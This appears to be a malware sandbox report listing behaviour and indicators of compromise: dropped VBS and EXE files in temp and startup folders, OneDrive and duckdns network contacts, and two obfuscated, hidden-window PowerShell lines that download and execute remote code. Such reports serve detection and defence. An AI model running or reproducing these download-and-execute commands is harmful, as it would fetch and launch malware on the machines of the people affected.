Technical information
- %APPDATA%\microsoft\windows\start menu\programs\startup\update.vbs
- '%TEMP%\tmp3d55.tmp.exe'
- https://onedrive.live.com/download?cid=1f9dbbce014d667c&resid=1f9dbbce014d667c%211855&authkey=ahweqn3slvmldcs
- https://onedrive.live.com/download?cid=1f9dbbce014d667c&resid=1f9dbbce014d667c%211854&authkey=agwwxuio43zubdk
- %TEMP%\tmpd37e.tmp.vbs
- %TEMP%\tmp3d55.tmp.exe
- %TEMP%\tmp7975.tmp.vbs
- 'on####ve.live.com':443
- 'sk####.#y.files.1drv.com':443
- 'sa###.duckdns.org':5000
- DNS ASK on####ve.live.com
- DNS ASK sk####.#y.files.1drv.com
- DNS ASK sa###.duckdns.org
- '<SYSTEM32>\wscript.exe' "%TEMP%\tmpD37E.tmp.vbs"
- '<SYSTEM32>\wscript.exe' "%TEMP%\tmp7975.tmp.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)Net.WebClient).DownloadString(''https://onedrive.live.com/download?cid=1F9DBBCE014D667C&resid=1F9DBBCE014D667C%211855&authkey=AHWEqN3sLvMLdcs'')'));...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)Net.WebClient).DownloadString(''https://onedrive.live.com/download?cid=1F9DBBCE014D667C&resid=1F9DBBCE014D667C%211854&authkey=AGWwXuio43zUbdk'')'));...' (with hidden window)
- '<SYSTEM32>\wscript.exe' "%TEMP%\tmp58BB.tmp.vbs"